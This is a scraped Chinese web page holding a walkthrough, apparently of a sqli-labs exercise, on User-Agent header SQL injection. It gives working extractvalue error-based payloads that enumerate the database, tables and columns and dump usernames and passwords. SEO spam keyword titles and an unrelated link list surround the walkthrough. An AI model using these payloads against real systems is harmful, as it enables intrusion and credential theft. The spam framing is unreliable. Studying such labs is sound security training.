当前位置: 首页 > wzjs >正文

做贸易的都有什么网站爱战网关键词查询网站

做贸易的都有什么网站,爱战网关键词查询网站,效果图在线网,有域名有空间如何做网站一:判断注入类型 先在用户名和密码框尝试判断,发现都得不到需要的回显 所以查看源码 可以发现username和password的输入后端都做了检查,没法直接注入 所以我们尝试uagent注入 UA注入: 没有url解码处理只识别原始空格&#xff…

一:判断注入类型

先在用户名和密码框尝试判断,发现都得不到需要的回显

所以查看源码

可以发现username和password的输入后端都做了检查,没法直接注入

所以我们尝试uagent注入

UA注入:

  • 没有url解码处理
  • 只识别原始空格,+,%20都不作为空格解析
  • 在User-agent字段中注入

先用一组密码登录,bp抓包 

构造判断的payload 

User-Agent: 1
User-Agent: 1'
User-Agent: 1"
User-Agent: 1')
User-Agent: 1")

单引号的时候产生不同的回显 

其余均为

确定为单引号字符型,尝试闭合

闭合成功但报错,其他几种情况闭合均无回显,所以我们尝试报错注入

二:开始注入

 1.爆数据库名

User-Agent: 1' and extractvalue(1,concat(0x7e,(database())))='1

2.爆表名

User-Agent: 1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))='1

3.爆列名 

User-Agent: 1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))='1

 4.爆数据

看数据量

User-Agent: 1' and extractvalue(1,concat(0x7e,(select count(*) from users)))='

分两次爆数据

extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))
extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))

 ❀❀❀ 完结撒花!!!❀❀❀

http://www.dtcms.com/wzjs/102751.html

相关文章:

  • 纯mvc做的都有那些网站淘宝seo搜索优化工具
  • 免费做背景调查的网站网络推广公司有多少家
  • 幼儿园网站模板html嘉兴百度快照优化排名
  • 专做冷冻食品批发的网站网络营销具有哪些特点
  • 老河口网站设计seo搜索引擎优化是通过优化答案
  • 做网站编辑应该注意什么秦洁婷seo博客
  • 婚纱定制网站哪个好什么是电商
  • 绍兴做网站公司关键词排名优化易下拉软件
  • 专门做汽车内饰的网站项目推广网
  • 电焊网片宁波优化网站排名软件
  • 东莞免费网站制作网址域名大全2345网址
  • 洛阳网站建设价格谷歌浏览器网页版进入
  • 视频网站建设方案书免费网站推广产品
  • 苏州建设项目备案网站网络营销策略包括哪四种
  • 怎样自己做淘宝客网站岳阳seo
  • 跨境电商平台官网seoul是什么品牌
  • 怎样更新网站文章网络营销手段有哪些方式
  • bootstrap制作的网站页面网站营销策略有哪些
  • html标签二十条优化疫情措施
  • 服务商官网东莞seo计费管理
  • 找装修seo主要做什么工作
  • 有没有做每日一图的网站电商网站建设 网站定制开发
  • 网站建设需求模板下载seo推广是什么意思
  • 金华正规网站建设总部谷歌推广方案
  • 庙行网站建设百度投广告怎么收费
  • 天河网站建设技术搜索引擎排名google
  • 做电子外贸网站建设短网址生成器免费
  • 全国做网站公司前十名外链seo服务
  • 社交网站只做百度最新版本2022
  • 效果好的免费网站建设腾讯广告推广怎么做